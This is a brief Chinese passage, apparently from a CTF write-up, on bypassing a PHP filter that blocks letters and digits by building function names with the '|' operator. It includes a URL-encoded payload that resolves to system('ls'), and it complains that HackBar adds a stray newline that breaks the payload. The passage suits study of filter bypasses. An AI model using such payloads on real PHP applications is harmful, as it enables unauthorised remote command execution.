仔细看,可以发现没有过滤 |
利用 或 构造字符串
使用这两个脚本无字母数字绕过.php无字母数字绕过.py
这两个需要搭配使用

最好要提醒一句
一定不要相信hackbar能正确处理你输入的编码过的字符,他一定会给你搞得一堆shit
这里如果使用hackbar传值,他会给你莫名其妙的加上一个空格,让你的代码无法执行

// 这是我给hackbar的参数
c=%28%22%13%19%13%14%05%0D%22%7C%22%60%60%60%60%60%60%22%29%28%22%0C%13%22%7C%22%60%60%22%29
//这是他发送的参数
c=%28%22%13%19%13%14%05%0D%0A%22%7C%22%60%60%60%60%60%60%22%29%28%22%0C%13%22%7C%22%60%60%22%29
//无缘无故的多了一个空格,导致代码无法执行
所以对于本来就是url的文本,最好的方式就是用burpsuite去传